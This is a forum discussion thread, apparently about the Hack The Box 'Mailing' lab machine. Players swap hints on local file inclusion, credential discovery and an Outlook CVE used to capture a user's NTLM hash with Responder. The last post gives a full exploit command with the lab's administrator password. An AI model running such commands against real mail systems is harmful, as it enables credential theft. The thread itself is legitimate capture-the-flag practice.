Official Mailing Discussion

If you believe your exploit is not working, try sending multiple times and interacting with the webpage (this worked for me!).

Root is so easy. Know your easy wins and what requires the least amount of effort.

Anyone else get system?

Buggy box for sure. Glad this one is done though.

iā€™m im the same situation. did you find the solution?

Iā€™m also looking for the same answer like where did the CVE come from. I donā€™t know the thought process of chaining that CVE here

I used the CVE but still cant capture any response. Not sure what im doing wrong

edit; NVM for some reason it worked as soon as I sent this message lol

How do I find out available users?

I waited a few minutes but nothing. are there any mails on the inbox?

I couldnā€™t find any emails either

Iā€™ve executed the exploit succesfully probably 50 times and still nothing in response. Is it just me or something wrong going on in this machine?

ask chatgpt for the location :smiley:

1 Like

same here, waiting now for 15 minutes and spamming all kind of different typos

1 Like

root hint : Get-Package

I found the LFI and the credentials and I successfully logged in to the mail server but Iā€™m hard stuck now. Can someone give me a clue?

Enumeration is key, If you find something interesting can you look at what it does?
There is a CVE once you find it.

Did you happen to find out what may be going wrong with that tool? I am in the same boat.

Everything Iā€™ve tried so far is:

  1. Changing the URL format slightly to see if that helps
  2. Tried stopping the Systemd-Resolved service so that the DNS server can use port 53 and the tool will stop complaining about that, but that didnā€™t seem to help either.
  3. Iā€™ve tried waiting an hour after using the exploit and still nothing shows up.
  4. Iā€™ve tried to use Wireshark to observe the traffic, but I donā€™t even see the authentication request being sent to my address.

Note: I know for a fact I have the right user and password because I verified it when connecting with telnet, so Iā€™m sort of stumped on this one.

Also not an easy box for me. A lot of disconnected stories on this box.

First, Do yourself a favor and reset the box.

User: IDK how I would have arrived at the solution without hints and spoilers. The CVE for foothold is not related to the service itself but the different clients that use it. Think about how each client might be able to send you a passive response.

Root: Again, reset! Traditional enumeration of the filesystem will get you some obvious pieces but even with spoilers I would only get lucky on the placement without reading the script. Think about how Important it is to understand what context the CVE runs under.

did you try to use telnet, it works for me, the email is sent but not action done, iam wondering if someone got it just using telnet, i know is possible by the cve, but i want o try something different,

anybody else here who found the exact needed exploit but responder wont give mayaā€™s hash back? Or am I the only one? python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --passwor
d homenetworkingadministrator --sender kitsu@snow.com --recipient maya@mailing.htb --url "\\ŧestemail
" --subject ā€œXDā€